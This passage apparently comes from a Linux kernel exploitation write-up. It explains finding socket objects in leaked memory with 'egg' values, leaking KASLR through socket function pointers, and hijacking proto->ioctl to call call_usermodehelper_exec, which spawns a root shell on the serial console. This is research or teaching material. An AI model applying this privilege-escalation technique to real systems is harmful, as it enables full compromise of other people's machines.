	<span class="k">struct</span> <span class="n">xfrm_policy</span> <span class="o">*</span>       <span class="n">sk_policy</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>         <span class="cm">/*   304    16 */</span>
	<span class="cm">/* --- cacheline 5 boundary (320 bytes) --- */</span>
	<span class="k">struct</span> <span class="n">dst_entry</span> <span class="o">*</span>         <span class="n">sk_dst_cache</span><span class="p">;</span>         <span class="cm">/*   320     8 */</span>
	<span class="n">atomic_t</span>                   <span class="n">sk_omem_alloc</span><span class="p">;</span>        <span class="cm">/*   328     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_sndbuf</span><span class="p">;</span>            <span class="cm">/*   332     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_wmem_queued</span><span class="p">;</span>       <span class="cm">/*   336     4 */</span>
	<span class="n">refcount_t</span>                 <span class="n">sk_wmem_alloc</span><span class="p">;</span>        <span class="cm">/*   340     4 */</span>
	<span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span>          <span class="n">sk_tsq_flags</span><span class="p">;</span>         <span class="cm">/*   344     8 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span>   <span class="n">sk_send_head</span><span class="p">;</span>         <span class="cm">/*   352     8 */</span>
		<span class="k">struct</span> <span class="n">rb_root</span>     <span class="n">tcp_rtx_queue</span><span class="p">;</span>        <span class="cm">/*   352     8 */</span>
	<span class="p">};</span>                                               <span class="cm">/*   352     8 */</span>
	<span class="k">struct</span> <span class="n">sk_buff_head</span>        <span class="n">sk_write_queue</span><span class="p">;</span>       <span class="cm">/*   360    24 */</span>
	<span class="cm">/* --- cacheline 6 boundary (384 bytes) --- */</span>
	<span class="n">__s32</span>                      <span class="n">sk_peek_off</span><span class="p">;</span>          <span class="cm">/*   384     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_write_pending</span><span class="p">;</span>     <span class="cm">/*   388     4 */</span>
	<span class="n">__u32</span>                      <span class="n">sk_dst_pending_confirm</span><span class="p">;</span> <span class="cm">/*   392     4 */</span>
	<span class="n">u32</span>                        <span class="n">sk_pacing_status</span><span class="p">;</span>     <span class="cm">/*   396     4 */</span>
	<span class="kt">long</span> <span class="kt">int</span>                   <span class="n">sk_sndtimeo</span><span class="p">;</span>          <span class="cm">/*   400     8 */</span>
	<span class="k">struct</span> <span class="n">timer_list</span>          <span class="n">sk_timer</span><span class="p">;</span>             <span class="cm">/*   408    40 */</span>

	<span class="cm">/* XXX last struct has 4 bytes of padding */</span>

	<span class="cm">/* --- cacheline 7 boundary (448 bytes) --- */</span>
	<span class="n">__u32</span>                      <span class="n">sk_priority</span><span class="p">;</span>          <span class="cm">/*   448     4 */</span>
	<span class="n">__u32</span>                      <span class="n">sk_mark</span><span class="p">;</span>              <span class="cm">/*   452     4 */</span>
	<span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span>          <span class="n">sk_pacing_rate</span><span class="p">;</span>       <span class="cm">/*   456     8 */</span>
	<span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span>          <span class="n">sk_max_pacing_rate</span><span class="p">;</span>   <span class="cm">/*   464     8 */</span>
    <span class="c1">// .. many more fields</span>
	<span class="cm">/* size: 760, cachelines: 12, members: 92 */</span>
	<span class="cm">/* sum members: 754, holes: 1, sum holes: 4 */</span>
	<span class="cm">/* sum bitfield members: 16 bits (2 bytes) */</span>
	<span class="cm">/* paddings: 2, sum paddings: 6 */</span>
	<span class="cm">/* forced alignments: 1 */</span>
	<span class="cm">/* last cacheline: 56 bytes */</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">__aligned__</span><span class="p">(</span><span class="mi">8</span><span class="p">)));</span>
</code></pre></div></div>
<p>Taking a look at <code class="language-plaintext highlighter-rouge">sk_setsockopt</code> in <a href="https://elixir.bootlin.com/linux/latest/source/net/core/sock.c#L1942">net/core/sock.c</a> we can see what fields of the sock structure we can set.</p>

<p>Some fields we could potentially set like <code class="language-plaintext highlighter-rouge">sk_mark</code> would require us to drop into a network namespace to obtain <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>. Thankfully there are some options that don’t have such requirements to set them.</p>

<p>Some good options that we could utilize are <code class="language-plaintext highlighter-rouge">SO_MAX_PACING_RATE</code> (sets <code class="language-plaintext highlighter-rouge">sk_max_pacing_rate</code>), <code class="language-plaintext highlighter-rouge">SO_SNDBUF</code> (sets <code class="language-plaintext highlighter-rouge">sk_sndbuf</code>) and <code class="language-plaintext highlighter-rouge">SO_RCVBUF</code> (sets <code class="language-plaintext highlighter-rouge">sk_rcvbuf</code>).</p>

<h4 id="two-eggs-">Two eggs <a name="twoeggs"></a></h4>
<p>Here perhaps the best option that we could pick is <code class="language-plaintext highlighter-rouge">SO_MAX_PACING_RATE</code>. It has one obvious advantage - we can use it to place <em>two eggs</em>, one at <code class="language-plaintext highlighter-rouge">sk_max_pacing_rate</code> and one at <code class="language-plaintext highlighter-rouge">sk_pacing_rate</code>. When the option <code class="language-plaintext highlighter-rouge">SO_MAX_PACING_RATE</code> is being set, the value of <code class="language-plaintext highlighter-rouge">sk_pacing_rate</code> is set to the new value of <code class="language-plaintext highlighter-rouge">sk_max_pacing_rate</code> if it is lower than the current value of <code class="language-plaintext highlighter-rouge">sk_pacing_rate</code>. Looking at the function <a href="https://elixir.bootlin.com/linux/latest/source/net/core/sock.c#L3477">sock_init_data_uid</a> we see that <code class="language-plaintext highlighter-rouge">sk_pacing_rate</code> is initialized to <code class="language-plaintext highlighter-rouge">~0UL = 0xffffffffffffffff</code>.</p>

<p>The obvious question is - why would we need two eggs? As we are leaking many pages we could meet our egg outside the context of a <code class="language-plaintext highlighter-rouge">sock</code> object. I tested it and indeed sometimes the first egg found was not a one in a <code class="language-plaintext highlighter-rouge">sock</code> object. By looking for two eggs at a fixed distance from one another, we are ensuring that the matches we find will be the <code class="language-plaintext highlighter-rouge">sock</code> objects we are looking for.</p>

<h4 id="identifying-the-sockets-">Identifying the sockets <a name="idsockets"></a></h4>
<p>We want to have a way to identify which socket we have found in memory. We can do that through the <code class="language-plaintext highlighter-rouge">SO_SNDBUF</code> option by storing the file descriptor of the socket in it. In reality, we have to kind of “encode” the value by doing <code class="language-plaintext highlighter-rouge">fd + SOCK_MIN_SNDBUF</code> and “decode” it on read by doing <code class="language-plaintext highlighter-rouge">val / 2 - SOCK_MIN_SNDBUF</code>.</p>

<p>Now the value of <code class="language-plaintext highlighter-rouge">SOCK_MIN_SNDBUF</code> is calculated using the following formula <code class="language-plaintext highlighter-rouge">2 * (2048 + ALIGN(sizeof(sk_buff), 1 &lt;&lt; L1_CACHE_SHIFT))</code>. The exact value depends on the value of <a href="https://elixir.bootlin.com/linux/v6.3-rc1/source/arch/x86/include/asm/cache.h#L9">L1_CACHE_SHIFT</a>. In my case <code class="language-plaintext highlighter-rouge">L1_CACHE_SHIFT = 6</code>, therefore <code class="language-plaintext highlighter-rouge">SOCK_MIN_SNDBUF = 4608</code>.</p>

<h3 id="leaking-kaslr-">Leaking KASLR <a name="kaslr"></a></h3>
<p>At the end of <code class="language-plaintext highlighter-rouge">struct sock</code>, there are quite a few function pointers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">sock</span> <span class="p">{</span>
    <span class="p">...</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_state_change</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   672     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_data_ready</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   680     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_write_space</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   688     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_error_report</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   696     8 */</span>
	<span class="cm">/* --- cacheline 11 boundary (704 bytes) --- */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">sk_backlog_rcv</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   704     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_destruct</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   712     8 */</span>
    <span class="p">...</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">__aligned__</span><span class="p">(</span><span class="mi">8</span><span class="p">)));</span>
</code></pre></div></div>
<p>Leaking any of them is sufficient to defeat KASLR. For a TCP socket, they will be set to the following functions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sk_state_change &lt;-&gt; &lt;sock_def_wakeup&gt;,
sk_data_ready &lt;-&gt; &lt;sock_def_readable&gt;,
sk_write_space &lt;-&gt; &lt;sk_stream_write_space&gt;,
sk_error_report &lt;-&gt; &lt;sock_def_error_report&gt;,
sk_backlog_rcv &lt;-&gt; &lt;tcp_v4_do_rcv&gt;,
sk_destruct &lt;-&gt; &lt;inet_sock_destruct&gt;
</code></pre></div></div>

<h3 id="privilege-escalation-">Privilege Escalation <a name="privesc"></a></h3>
<p>Our ultimate goal is to achieve privilege escalation. With KASLR out of the way, we can move towards it.</p>

<p>As we already have control over a <code class="language-plaintext highlighter-rouge">sock</code> object we can use the same object to escalate.
The first member of the <code class="language-plaintext highlighter-rouge">sock</code> object is <code class="language-plaintext highlighter-rouge">struct sock_common</code> which is the minimal network layer representation of sockets in the kernel.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">sock_common</span> <span class="p">{</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">__addrpair</span>         <span class="n">skc_addrpair</span><span class="p">;</span>         <span class="cm">/*     0     8 */</span>
		<span class="k">struct</span> <span class="p">{</span>
			<span class="n">__be32</span>     <span class="n">skc_daddr</span><span class="p">;</span>            <span class="cm">/*     0     4 */</span>
			<span class="n">__be32</span>     <span class="n">skc_rcv_saddr</span><span class="p">;</span>        <span class="cm">/*     4     4 */</span>
		<span class="p">};</span>                                       <span class="cm">/*     0     8 */</span>
	<span class="p">};</span>                                               <span class="cm">/*     0     8 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="kt">unsigned</span> <span class="kt">int</span>       <span class="n">skc_hash</span><span class="p">;</span>             <span class="cm">/*     8     4 */</span>
		<span class="n">__u16</span>              <span class="n">skc_u16hashes</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>     <span class="cm">/*     8     4 */</span>
	<span class="p">};</span>                                               <span class="cm">/*     8     4 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">__portpair</span>         <span class="n">skc_portpair</span><span class="p">;</span>         <span class="cm">/*    12     4 */</span>
		<span class="k">struct</span> <span class="p">{</span>
			<span class="n">__be16</span>     <span class="n">skc_dport</span><span class="p">;</span>            <span class="cm">/*    12     2 */</span>
			<span class="n">__u16</span>      <span class="n">skc_num</span><span class="p">;</span>              <span class="cm">/*    14     2 */</span>
		<span class="p">};</span>                                       <span class="cm">/*    12     4 */</span>
	<span class="p">};</span>                                               <span class="cm">/*    12     4 */</span>
	<span class="kt">short</span> <span class="kt">unsigned</span> <span class="kt">int</span>         <span class="n">skc_family</span><span class="p">;</span>           <span class="cm">/*    16     2 */</span>
	<span class="k">volatile</span> <span class="kt">unsigned</span> <span class="kt">char</span>     <span class="n">skc_state</span><span class="p">;</span>            <span class="cm">/*    18     1 */</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>              <span class="n">skc_reuse</span><span class="o">:</span><span class="mi">4</span><span class="p">;</span>          <span class="cm">/*    19: 0  1 */</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>              <span class="n">skc_reuseport</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>      <span class="cm">/*    19: 4  1 */</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>              <span class="n">skc_ipv6only</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>       <span class="cm">/*    19: 5  1 */</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>              <span class="n">skc_net_refcnt</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>     <span class="cm">/*    19: 6  1 */</span>

	<span class="cm">/* XXX 1 bit hole, try to pack */</span>

	<span class="kt">int</span>                        <span class="n">skc_bound_dev_if</span><span class="p">;</span>     <span class="cm">/*    20     4 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">hlist_node</span>  <span class="n">skc_bind_node</span><span class="p">;</span>        <span class="cm">/*    24    16 */</span>
		<span class="k">struct</span> <span class="n">hlist_node</span>  <span class="n">skc_portaddr_node</span><span class="p">;</span>    <span class="cm">/*    24    16 */</span>
	<span class="p">};</span>                                               <span class="cm">/*    24    16 */</span>
	<span class="k">struct</span> <span class="n">proto</span> <span class="o">*</span>             <span class="n">skc_prot</span><span class="p">;</span>             <span class="cm">/*    40     8 */</span>

	<span class="p">...</span>

	<span class="cm">/* size: 136, cachelines: 3, members: 25 */</span>
	<span class="cm">/* sum members: 135 */</span>
	<span class="cm">/* sum bitfield members: 7 bits, bit holes: 1, sum bit holes: 1 bits */</span>
	<span class="cm">/* last cacheline: 8 bytes */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>We can see at offset 40 bytes from its start, a pointer to a <code class="language-plaintext highlighter-rouge">struct proto</code> object. A <code class="language-plaintext highlighter-rouge">proto</code> object describes how operations should be handled at the transport layer. It is primarily a collection of function pointers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">proto</span> <span class="p">{</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">close</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*     0     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">pre_connect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*     8     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">connect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    16     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">disconnect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    24     8 */</span>
	<span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span>              <span class="p">(</span><span class="o">*</span><span class="n">accept</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="p">,</span> <span class="n">bool</span><span class="p">);</span> <span class="cm">/*    32     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">ioctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    40     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    48     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">destroy</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    56     8 */</span>
	<span class="cm">/* --- cacheline 1 boundary (64 bytes) --- */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">shutdown</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    64     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">setsockopt</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="n">sockptr_t</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    72     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">getsockopt</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    80     8 */</span>

	<span class="p">...</span>

	<span class="cm">/* size: 432, cachelines: 7, members: 54 */</span>
	<span class="cm">/* sum members: 425, holes: 2, sum holes: 7 */</span>
	<span class="cm">/* last cacheline: 48 bytes */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Here we have quite a few candidates but the one we are really interested in is the <code class="language-plaintext highlighter-rouge">ioctl</code>. By writing our “gadget” to <code class="language-plaintext highlighter-rouge">ioctl</code> we will be able to invoke it by just invoking an ioctl call to the socket.</p>

<p>However in order to write our gadget at <code class="language-plaintext highlighter-rouge">proto-&gt;ioctl</code> we first need to set up a fake <code class="language-plaintext highlighter-rouge">proto</code> object. This is easy enough, we can write it below our <code class="language-plaintext highlighter-rouge">sock</code> object. To do this safely, we need to ensure that right after the <code class="language-plaintext highlighter-rouge">sock</code> object we aren’t overwriting anything that we shouldn’t be.</p>

<p>Making the sockets TCP sockets (<code class="language-plaintext highlighter-rouge">tcp_sock</code>), for example, gives us quite a bit of leeway.</p>

<h4 id="peeling-back-tcp_sock-">Peeling back tcp_sock <a name="tcp_sock"></a></h4>
<p><code class="language-plaintext highlighter-rouge">tcp_sock</code> is the top_level object.<br />
 <code class="language-plaintext highlighter-rouge">struct inet_connection_sock inet_conn</code> is the first member of <code class="language-plaintext highlighter-rouge">tcp_sock</code><br />
  <code class="language-plaintext highlighter-rouge">struct inet_sock icsk_inet</code> is the first member of <code class="language-plaintext highlighter-rouge">inet_connection_sock</code><br />
   <code class="language-plaintext highlighter-rouge">struct sock sk</code> is the first member of <code class="language-plaintext highlighter-rouge">inet_sock</code></p>

<p>So in memory, stuff is set up the following way:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>--- sock @0
----- inet_sock 
------ inet_connection_sock 
------- tcp_sock @1400
</code></pre></div></div>
<p>In total <code class="language-plaintext highlighter-rouge">tcp_sock</code> is of size 2208 bytes (on v6.3-rc1).</p>

<p>We have the freedom to place our fake proto object below <code class="language-plaintext highlighter-rouge">sock</code> proper, writing over the <code class="language-plaintext highlighter-rouge">inet_sock</code>. We will only need to restore the <code class="language-plaintext highlighter-rouge">tcp_sock</code> after making our <code class="language-plaintext highlighter-rouge">ioctl</code> call to its initial state so as to not accidentally panic the kernel when the socket gets destroyed.</p>

<h4 id="call_usermodehelper_exec-">call_usermodehelper_exec <a name="call_usermodehelper_exec"></a></h4>
<p>A very clean gadget that we could use is <a href="https://elixir.bootlin.com/linux/v6.3-rc1/source/kernel/umh.c#L385">call_usermodehelper_exec</a>. It allows us to start a user-mode process from kernel space. It takes two arguments - <code class="language-plaintext highlighter-rouge">(struct subprocess_info *sub_info, int wait)</code>.</p>

<p>Looking at <code class="language-plaintext highlighter-rouge">struct proto</code> we can see that the ioctl is defined as <code class="language-plaintext highlighter-rouge">(*ioctl)(struct sock *, int, long unsigned int);</code>. We cannot control <code class="language-plaintext highlighter-rouge">sub_info</code> - it will always be a pointer to our <code class="language-plaintext highlighter-rouge">sock</code> object.</p>

<p>So now the question is - are we able to write a fake <code class="language-plaintext highlighter-rouge">subprocess_info</code> object over the beginning of our socket without breaking it?</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">subprocess_info</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">work_struct</span>         <span class="n">work</span><span class="p">;</span>                 <span class="cm">/*     0    32 */</span>
	<span class="k">struct</span> <span class="n">completion</span> <span class="o">*</span>        <span class="n">complete</span><span class="p">;</span>             <span class="cm">/*    32     8 */</span>
	<span class="k">const</span> <span class="kt">char</span>  <span class="o">*</span>              <span class="n">path</span><span class="p">;</span>                 <span class="cm">/*    40     8 */</span>
	<span class="kt">char</span> <span class="o">*</span> <span class="o">*</span>                   <span class="n">argv</span><span class="p">;</span>                 <span class="cm">/*    48     8 */</span>
	<span class="kt">char</span> <span class="o">*</span> <span class="o">*</span>                   <span class="n">envp</span><span class="p">;</span>                 <span class="cm">/*    56     8 */</span>
	<span class="cm">/* --- cacheline 1 boundary (64 bytes) --- */</span>
	<span class="kt">int</span>                        <span class="n">wait</span><span class="p">;</span>                 <span class="cm">/*    64     4 */</span>
	<span class="kt">int</span>                        <span class="n">retval</span><span class="p">;</span>               <span class="cm">/*    68     4 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)(</span><span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">cred</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    72     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">cleanup</span><span class="p">)(</span><span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    80     8 */</span>
	<span class="kt">void</span> <span class="o">*</span>                     <span class="n">data</span><span class="p">;</span>                 <span class="cm">/*    88     8 */</span>

	<span class="cm">/* size: 96, cachelines: 2, members: 10 */</span>
	<span class="cm">/* last cacheline: 32 bytes */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first member of <code class="language-plaintext highlighter-rouge">subprocess_info</code> is a <a href="https://elixir.bootlin.com/linux/v6.3-rc1/source/include/linux/workqueue.h#L97">work_struct</a> - an object that describes <em>deferred work</em>. Then we have parameters like <code class="language-plaintext highlighter-rouge">path</code> which holds a pointer to the path of our executable, <code class="language-plaintext highlighter-rouge">argv</code> which is a pointer to the array of pointers to each of the arguments and <code class="language-plaintext highlighter-rouge">envp</code> which is the same but for environment variables. The function pointer <code class="language-plaintext highlighter-rouge">init</code> holds the function that will be called on initialization to set up the credentials of the process - if it is set to null, it will start with the credentials of system workqueues (as root). Likewise, if <code class="language-plaintext highlighter-rouge">cleanup</code> is set, it gets executed after the subprocess exits.</p>

<h4 id="overlapping-subprocess_info-">Overlapping subprocess_info <a name="overlap_subprocess_info"></a></h4>
<p>As we established, our <code class="language-plaintext highlighter-rouge">subprocess_info</code> will need to overlap with the start of the <code class="language-plaintext highlighter-rouge">sock</code> object as the first argument of the <code class="language-plaintext highlighter-rouge">ioctl</code> is <code class="language-plaintext highlighter-rouge">sock *</code>. However, the first 136 bytes of <code class="language-plaintext highlighter-rouge">struct sock</code> are occupied by  <code class="language-plaintext highlighter-rouge">struct sock_common</code>.</p>

<pre><code class="language-txt">struct sock[sock_common]      | subprocess_info
============================================================
0x0: skc_addrpair             | work.data
0x8: skc_hash, skc_u16hashes  | work.entry.next
0x10: skc_portpair, ..., ...  | work.entry.prev
0x18: skc_bind_node[0:7]      | work.func
0x20: skc_bind_node[8:15]     | complete
0x28: skc_prot (struct proto) | path
0x30: skc_net                 | argv
0x38: skc_v6_daddr            | envp
0x40: *padding*               | wait, retval
0x48: skc_v6_rcv_saddr[0:7]   | *init
0x50: skc_v6_rcv_saddr[8:15]  | *cleanup
0x58: skc_cookie              | data
============================================================
</code></pre>

<p>As we see the value of <code class="language-plaintext highlighter-rouge">skc_prot</code> overlaps with <code class="language-plaintext highlighter-rouge">path</code>. If we set <code class="language-plaintext highlighter-rouge">path</code> to anything else we will be overwriting <code class="language-plaintext highlighter-rouge">skc_prot</code> which will break our exploit as we need <code class="language-plaintext highlighter-rouge">skc_prot</code> to point to our fake <code class="language-plaintext highlighter-rouge">proto</code> structure at the end of <code class="language-plaintext highlighter-rouge">sock</code> proper. So, can we overlap <code class="language-plaintext highlighter-rouge">path</code> with the start of our <code class="language-plaintext highlighter-rouge">proto</code> structure?</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">proto</span> <span class="p">{</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">close</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*     0     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">pre_connect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*     8     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">connect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    16     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">disconnect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    24     8 */</span>
	<span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span>              <span class="p">(</span><span class="o">*</span><span class="n">accept</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="p">,</span> <span class="n">bool</span><span class="p">);</span> <span class="cm">/*    32     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">ioctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    40     8 */</span>
	<span class="p">...</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The only value in <code class="language-plaintext highlighter-rouge">proto</code> we need to keep is <code class="language-plaintext highlighter-rouge">ioctl</code> as it holds <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec</code>. We don’t care about all other values as we won’t be connecting, disconnecting or closing the socket - so we can freely write over those members. This leaves us with 40 bytes free at the start of <code class="language-plaintext highlighter-rouge">proto</code> for our path. More than enough :)</p>

<h4 id="setting-up-the-arguments-">Setting up the arguments <a name="arguments"></a></h4>
<p>We also need to set up our arguments for <code class="language-plaintext highlighter-rouge">subprocess_info</code>. Our goal is to execute something like <code class="language-plaintext highlighter-rouge">/bin/sh -c /bin/sh &amp;&gt;/dev/ttyS0 &lt;/dev/ttyS0</code>. Let’s break it down.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/bin/sh -c /bin/sh &amp;&gt;/dev/ttyS0 &lt;/dev/ttyS0
 ^      ^  |______________________________|	
 |      |               |
 |      |               |
path   arg1            arg2
arg0	
</code></pre></div></div>
<p>We are essentially asking <code class="language-plaintext highlighter-rouge">/bin/sh</code> to spawn us another <code class="language-plaintext highlighter-rouge">/bin/sh</code> process but we redirect its <code class="language-plaintext highlighter-rouge">stdin</code> and <code class="language-plaintext highlighter-rouge">stdout</code> to our virtual console/serial port.</p>

<p>However, all of those strings need to go somewhere. We already established that <code class="language-plaintext highlighter-rouge">path</code> will need to go at the start of <code class="language-plaintext highlighter-rouge">proto</code> but there isn’t enough space there for all of those strings. A convenient location for them is overlapping with <code class="language-plaintext highlighter-rouge">inet_sock / inet_connection_sock / tcp_sock</code> after <code class="language-plaintext highlighter-rouge">sock</code> proper. There we can write both the strings and the <code class="language-plaintext highlighter-rouge">argv</code> array of pointers.</p>

<p>This though, presents another problem. In order to set up <code class="language-plaintext highlighter-rouge">argv</code> we need to know the addresses in memory of all the arguments we set up. So aside from KASLR, we need to also leak the address of our <code class="language-plaintext highlighter-rouge">sock</code> object in memory so we can calculate the location at which our arguments are.</p>

